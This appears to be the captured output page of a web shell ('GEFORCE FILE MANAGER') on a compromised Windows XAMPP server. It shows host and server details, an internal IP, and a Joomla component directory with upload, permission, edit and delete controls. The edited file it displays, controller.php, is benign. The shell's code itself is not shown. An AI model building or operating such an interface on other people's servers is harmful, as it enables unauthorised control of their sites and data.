[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
administrator
/
components
/
com_baforms
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 assets
SET
[ DEL ]
📁 controllers
SET
[ DEL ]
📁 helpers
SET
[ DEL ]
📁 installation
SET
[ DEL ]
📁 language
SET
[ DEL ]
📁 models
SET
[ DEL ]
📁 tables
SET
[ DEL ]
📁 views
SET
[ DEL ]
📄 config.xml
1,916 B
SET
[ EDIT ]
|
[ DEL ]
📄 controller.php
450 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.html
32 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: controller.php
<?php /** * @package BaForms * @author Balbooa http://www.balbooa.com/ * @copyright Copyright @ Balbooa * @license http://www.gnu.org/licenses/gpl.html GNU/GPL */ defined('_JEXEC') or die; class baformsController extends JControllerLegacy { function display($cachable = false, $urlparams = false) { $input = JFactory::getApplication()->input; $input->set('view', $input->getCmd('view', 'forms')); parent::display($cachable); } }